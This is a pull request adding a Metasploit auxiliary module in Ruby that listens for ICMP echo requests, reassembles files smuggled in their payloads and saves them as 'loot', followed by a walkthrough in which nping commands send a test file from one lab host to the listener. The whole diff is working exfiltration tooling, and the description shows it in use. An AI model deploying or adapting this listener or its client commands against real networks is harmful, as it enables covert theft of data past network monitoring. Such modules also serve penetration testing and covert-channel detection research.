### PR TITLE
ICMP Data Exfiltration Module

### DIFF
--- a/modules/auxiliary/server/icmp_exfil.rb
+++ b/modules/auxiliary/server/icmp_exfil.rb
@@ -1,0 +1,238 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+    include Msf::Exploit::Remote::Capture
+    include Msf::Auxiliary::Report
+
+    def initialize
+        super(
+            'Name'        => 'ICMP Exfiltration',
+            'Version'     => '$Revision$',
+            'Description' => %q{
+                This module is designed to provide a server-side component to receive and store files
+                exfiltrated over ICMP.
+
+                To use this module you will need to send an initial ICMP echo request containing the
+                specified trigger (defaults to '^BOF:') followed by the filename being sent. All data
+                received from this source will automatically be added to the receive buffer until an
+                ICMP echo request containing a specific end command (defaults to 'EOL') is received.
+            },
+            'Author'      =>     'Chris John Riley',
+            'License'     =>     MSF_LICENSE,
+            'References'    =>
+                [
+                    # general
+                    ['URL', 'http://blog.c22.cc'],
+                    # packetfu
+                    ['URL','http://code.google.com/p/packetfu/']
+                ]
+        )
+
+        register_options([
+            OptString.new('START_TRIGGER',      [true, 'Trigger to listen for (followed by filename)', '^BOF:']),
+            OptString.new('END_TRIGGER',      [true, 'End of File command', '^EOF']),
+            OptString.new('RESPONSE',        [true, 'Data to respond when initial trigger matches', 'BEGIN']),
+            OptString.new('BPF_FILTER',      [true, 'BFP format filter to listen for', 'icmp']),
+            OptString.new('INTERFACE',     [false, 'The name of the interface']),
+        ], self.class)
+
+        register_advanced_options([
+            OptString.new('CLOAK',    [false, 'Create the response packet using a specific OS fingerprint (windows, linux, freebsd)', 'linux']),
+            OptBool.new('PROMISC',          [false, 'Enable/Disable promiscuous mode', false]),
+        ], self.class)
+
+        deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT')
+    end
+
+    def run
+        begin
+            @interface = datastore['INTERFACE'] || Pcap.lookupdev
+            @interface = get_interface_guid(@interface)
+            @iface_ip = Pcap.lookupaddrs(@interface)[0]
+
+            @filter = datastore['BPF_FILTER']
+            @eoftrigger = datastore['END_TRIGGER']
+            @boftrigger = datastore['START_TRIGGER']
+            @response = datastore['RESPONSE']
+            @promisc = datastore['PROMISC'] || false
+            @cloak = datastore['CLOAK'].downcase || 'linux'
+
+            @record = false
+
+            if @promisc
+                 print_status("Warning: Promiscuous mode enabled. This may cause issues!")
+            end
+
+            # start listner
+            icmplistener
+
+        rescue  =>  ex
+            print_error(ex.message)
+        ensure
+            storefile
+            print_status("Stopping ICMP listener on %s (%s)" % [@interface, @iface_ip])
+        end
+    end
+
+    def icmplistener
+        # start icmp listener
+
+        print_good("ICMP Listener started on %s (%s). Monitoring for trigger packet containing %s" % [@interface, @iface_ip, @boftrigger])
+        cap = PacketFu::Capture.new(:iface => @interface, :start => true, :filter => @filter, :promisc => @promisc)
+        loop {
+            cap.stream.each do |pkt|
+                packet = PacketFu::Packet.parse(pkt)
+                data = packet.payload[4..-1]
+
+                if packet.is_icmp? and data =~ /#{@boftrigger}/
+
+                    print_status("#{Time.now}: SRC:%s ICMP (type %d code %d) DST:%s" % [packet.ip_saddr, packet.icmp_type, packet.icmp_code, packet.ip_daddr])
+
+                    # detect and warn if system is responding to ICMP echo requests
+                    # suggested fixes:
+                    #
+                    # (linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
+                    # (Windows) netsh firewall set icmpsetting 8 disable
+                    # (Windows cont.) netsh firewall set opmode mode = ENABLE
+
+                    if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
+                        raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!"
+                    end
+
+                    if @record
+                        print_error("New file started without saving old data")
+                        storefile
+                    end
+
+                    @p_icmp = packet
+
+                    # begin recording stream
+                    @record = true
+                    @record_host = packet.ip_saddr
+                    @record_data = ''
+                    @filename = data[(@boftrigger.length-1)..-1].strip # set filename from icmp payload
+
+                    print_good("Beginning capture of %s data" % @filename)
+
+                    # create response packet icmp_pkt
+                    icmp_packet
+
+                    if not @icmp_response
+                        raise RuntimeError ,"Could not build ICMP resonse"
+                    else
+                        # send response packet icmp_pkt
+                        send_icmp
+                    end
+                    break
+
+                elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr
+                    # check for EOF marker, if not continue recording
+
+                    if data =~ /#{@eoftrigger}/
+                        print_status("%d bytes of data recevied in total" % @record_data.length)
+                        print_good("End of File received. Saving %s to loot" % @filename)
+                        storefile
+                        @p_icmp = packet
+
+                        # create response packet icmp_pkt
+                        icmp_packet
+
+                        if not @icmp_response
+                            raise RuntimeError , "Could not build ICMP resonse"
+                        else
+                            # send response packet icmp_pkt
+                            send_icmp
+                        end
+
+                        # turn off recording and clear status
+                        @record = false
+                        @record_host = ''
+                        @record_data = ''
+                    else
+                        @record_data << data.to_s()
+                        print_status("Received %s bytes of data from %s" % [data.length, packet.ip_saddr])
+                        @p_icmp = packet
+
+                        # create response packet icmp_pkt
+                        icmp_packet
+
+                        if not @icmp_response
+                            raise RuntimeError , "Could not build ICMP resonse"
+                        else
+                            # send response packet icmp_pkt
+                            send_icmp
+                        end
+                    end
+                end
+            end
+        }
+    end
+
+    def icmp_packet
+        # create icmp response
+
+        begin
+
+            @src_ip = @p_icmp.ip_daddr
+            @src_mac = @p_icmp.eth_daddr
+            @dst_ip = @p_icmp.ip_saddr
+            @dst_mac = @p_icmp.eth_saddr
+            @icmp_id = @p_icmp.payload[0,2]
+            @icmp_seq = @p_icmp.payload[2,2]
+            # create payload with matching id/seq
+            @resp_payload = @icmp_id + @icmp_seq + @response
+
+            icmp_pkt = PacketFu::ICMPPacket.new(:flavor => @cloak)
+            icmp_pkt.eth_saddr = @src_mac
+            icmp_pkt.eth_daddr = @dst_mac
+            icmp_pkt.icmp_type = 0
+            icmp_pkt.icmp_code = 0
+            icmp_pkt.payload = @resp_payload
+            icmp_pkt.ip_saddr = @src_ip
+            icmp_pkt.ip_daddr = @dst_ip
+            icmp_pkt.recalc
+            @icmp_response = icmp_pkt
+        rescue  =>  ex
+            print_error(ex.message)
+        end
+    end
+
+    def send_icmp
+        # send icmp response
+
+        begin
+            @icmp_response.to_w(iface = @interface)
+            if datastore['VERBOSE']
+                print_good("Response sent to %s containing %d bytes of data" % [@dst_ip, @response.length])
+            end
+        rescue  =>  ex
+            print_error(ex.message)
+        end
+    end
+
+    def storefile
+        # store the file
+        loot = store_loot(
+                "icmp_exfil",
+                "text/xml",
+                @src_ip,
+                @record_data,
+                @filename,
+                "ICMP Exfiltrated Data"
+                )
+        print_good("Incoming file %s saved to loot" % @filename)
+        print_good("Loot filename: %s" % loot)
+    end
+end


### PR DESCRIPTION
Tested with nping for data exfiltration (client-side script is suggested to get the full functionality out of the module).

Walkthrough
# 
# == Client ==

> nping --icmp 10.0.0.138 --data-string "BOF:test.txt" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.5860s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=42953 iplen=40
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=3551 iplen=33

Max rtt: 13.000ms | Min rtt: 13.000ms | Avg rtt: 13.000ms
Raw packets sent: 1 (54B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.46000s | Tx bytes/s: 117.39 | Tx pkts/s: 2.17
Rx time: 1.46000s | Rx bytes/s: 22.60 | Rx pkts/s: 0.68
Nping done: 1 IP address pinged in 2.05 seconds

> nping --icmp 10.0.0.138 --data-string "test text...." -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6230s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=38228 iplen=41
RCVD (1.0540s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=14168 iplen=33

Max rtt: 10.000ms | Min rtt: 10.000ms | Avg rtt: 10.000ms
Raw packets sent: 1 (55B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42200s | Tx bytes/s: 130.33 | Tx pkts/s: 2.37
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.04 seconds

> nping --icmp 10.0.0.138 --data-string " test text.... again" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6260s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=12163 iplen=48
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=60632 iplen=33

Max rtt: 12.000ms | Min rtt: 12.000ms | Avg rtt: 12.000ms
Raw packets sent: 1 (62B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42100s | Tx bytes/s: 147.27 | Tx pkts/s: 2.38
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.05 seconds

> nping --icmp 10.0.0.138 --data-string "EOF" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:06 W. Europe Daylight Time
SENT (0.6420s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=30459 iplen=31
RCVD (1.0970s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=55188 iplen=33

Max rtt: 24.000ms | Min rtt: 24.000ms | Avg rtt: 24.000ms
Raw packets sent: 1 (45B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.43100s | Tx bytes/s: 104.41 | Tx pkts/s: 2.32
Rx time: 1.43100s | Rx bytes/s: 23.06 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.07 seconds
# 
# == SERVER ==

msf  auxiliary(icmp_exfil) > rerun
[*] Reloading module...

[+] ICMP Listener started on eth0 (10.0.0.138). Monitoring for trigger packet containing ^BOF:
[_] 2012-04-04 15:05:31 +0200: SRC:10.0.0.148 ICMP (type 8 code 0) DST:10.0.0.138
[+] Beginning capture of test.txt data
[_] Received 18 bytes of data from 10.0.0.148
[_] Received 20 bytes of data from 10.0.0.148
[_] 38 bytes of data recevied in total
[+] End of File received. Saving test.txt to loot
[+] Incoming file test.txt saved to loot
[+] Loot filename: /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
[_] Stopping ICMP listener on eth0 (10.0.0.138)
[-] Auxiliary interrupted by the console user
[_] Auxiliary module execution completed
msf  auxiliary(icmp_exfil) > loot
# Loot

host        service  type        name      content   info                    path

---

10.0.0.138           icmp_exfil  test.txt  text/xml  ICMP Exfiltrated Data   /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
